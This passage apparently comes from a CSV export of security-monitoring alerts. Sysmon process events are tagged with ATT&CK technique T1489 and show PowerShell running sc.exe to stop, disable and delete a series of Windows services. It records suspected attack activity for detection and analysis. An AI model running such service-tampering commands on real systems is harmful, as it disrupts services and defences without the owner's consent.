+Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Sougoudl +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Sougoudl",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.043982400Z"",""eventRecordID"":""3384"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.041\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001055212e00}\r\nProcessId: 5996\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Sougoudl\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.041"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-001055212e00}"",""processId"":""5996"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Sougoudl"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.968",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.031 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00108d202e00} +ProcessId: 7804 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Sougoudl +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.033692300Z"",""eventRecordID"":""3383"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.031\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00108d202e00}\r\nProcessId: 7804\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.031"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-00108d202e00}"",""processId"":""7804"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Sougoudl"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.921",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.990 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-0010331d2e00} +ProcessId: 7800 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WmdnPnSN +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WmdnPnSN",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.992205100Z"",""eventRecordID"":""3380"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.990\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-0010331d2e00}\r\nProcessId: 7800\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WmdnPnSN\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.990"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-0010331d2e00}"",""processId"":""7800"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WmdnPnSN"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.878",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.940 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-001073192e00} +ProcessId: 7516 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop \gm +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \\gm",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.942054700Z"",""eventRecordID"":""3377"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.940\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-001073192e00}\r\nProcessId: 7516\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \\gm\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.940"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-001073192e00}"",""processId"":""7516"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\\gm"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.866",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.919 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-001085182e00} +ProcessId: 1240 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config \gm Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config \\gm Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.921477500Z"",""eventRecordID"":""3376"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.919\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-001085182e00}\r\nProcessId: 1240\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config \\gm Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.919"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-001085182e00}"",""processId"":""1240"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config \\\\gm Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.828",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.888 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-00107a162e00} +ProcessId: 5356 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop sysmgt +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop sysmgt",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.890455000Z"",""eventRecordID"":""3374"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.888\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-00107a162e00}\r\nProcessId: 5356\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop sysmgt\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.888"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-00107a162e00}"",""processId"":""5356"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop sysmgt"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.780",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.851 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-001020142e00} +ProcessId: 2580 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop CLR +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 